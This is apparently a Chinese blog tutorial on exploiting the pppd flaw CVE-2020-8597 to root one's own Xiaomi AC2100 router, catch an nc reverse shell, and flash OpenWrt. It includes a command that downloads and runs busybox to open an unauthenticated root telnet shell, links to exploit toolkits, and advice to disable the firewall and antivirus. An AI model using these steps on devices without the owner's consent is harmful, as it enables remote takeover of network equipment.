利用CVE-2020-8597漏洞解锁小米AC2100

文章目录

最新简单方法参考:https://www.right.com.cn/forum/thread-4066963-1-1.html

CVE-2020-8597介绍

US-CERT发布了一个关于影响PPP daemon(pppd)软件的存在17年之久的远程代码执行漏洞的公告,影响几乎所有基于Linux的操作系统以及网络设备固件。该漏洞为栈缓冲溢出漏洞(CVE-2020-8597),CVSS评分为9.8分;pppd中的eap.c在eap_request和eap_response函数中rhostname参数存在缓冲区溢出,未经身份验证的攻击者发送恶意伪造的EAP包,可在受影响的系统中远程执行任意代码。

鸣谢“恩山无线”无私奉献者的资料参考。

步骤

1、开启xiaomi AC2100 PPPoe拨号功能

2、短接Wan和Lan口

3、将与电脑网线连接在另一条Lan口

4、利用漏洞发送开启PPPOE服务命令

5、Nc.exe 反弹Shell

6、刷入OpenWrt

刷机工具和救砖工具包

xiaomi AC2100 刷机工具包:https://exploit.lanzous.com/iCX87ditc6d (适用于小米/红米AC2100)

xiaomi AC2100救砖工具包:https://exploit.lanzous.com/ipFzZditaje (不适用于红米AC2100)

AC2100刷机教程

1、关闭电脑防火墙和杀毒软件、开启Telnet功能或者使用Xshell

2、解压刷机工具包,安装 npcap-0.9991.exe

3、本机禁用无线及虚拟机网卡,只保留有线,有线IP设置为192.168.31.177

4、将路由器Lan2口连接到电脑,查看IP是否为“192.168.31.1”,如果是继续下一步

5、短接Wan口和Lan1口,完事可以重启下路由器看下ip是不是还正确,如果正确继续

6、进入路由器后台将上网模式转为PPPOE拨号,账户密码随便写 123 123都行点击连接

7、执行安装包中的“一键开启telnet.bat”按照提示进行操作(执行完到反弹Shell出来的时候,执行命令检查本地文件服务是否开启,如果没有开启就无法将r3g.bin下载到路由器里)

8、在反弹Shell中执行“cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh”(安装Busybox 开启Telnet服务)

9、Telnet 192.168.31.1,进入tmp目录下,下载r3g.bin到tmp中,然后执行刷机命令

下载固件设置参数:

wget http://192.168.31.177:8081/r3g.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit

刷机:

mtd -r write r3g.bin kernel1

10、刷机开始,完成后会提示rebooting,说明刷机完成。

11、此时修改IP为192.168.1.23,然后ping 192.168.1.1,直到ping通。

12、WinSCP连接路由器,IP地址为192.168.1.1,端口22,用户名密码root—admin(SCP协议,非XFTP),把固件上传到/tmp下

13、用Putty或Xshell连接到Shell 192.168.1.1,到/tmp目录下,执行mtd -r write /tmp/xxxxx.trx或.bin kernel

14、根据固件提示完成新ip设置,进入对应固件系统后台即可

救砖

1、下载解压救砖包

2、连接Lan1口到电脑

3、运行压缩包唯一的exe执行文件

4、将”miwifi_r2100_firmware_64288_2.0.376.bin“选择

5、执行下一步,选择网卡,如果提示成功,拔掉路由器电源。在关机状态下按住Reset按钮,然后插电,知道软件提示刷机开始就可以松开了。一般5秒内就提示开始了,如果没有反应,估计是你刷错了。参考不死鸟刷入:如果刷到Bootloader里面就需要返厂维修了,或者用NAND还原(很麻烦)。

刷入不死鸟

根据网上提供的“breed-mt7621-xxx.bin”不死鸟固件是不建议刷,小米官方的Bootloader本身救很方便救砖,如果刷这个不死鸟固件失败,相当于就是纯砖块了,而且官方的救砖也不能用了。只要是执行mtd_write -r write /tmp/xxxx.bin Bootloader,一律不建议操作,万一失败要么用NAND编程器还原备份、要么返厂维修。两个都是很麻烦的。

原文链接:利用CVE-2020-8597漏洞解锁小米AC2100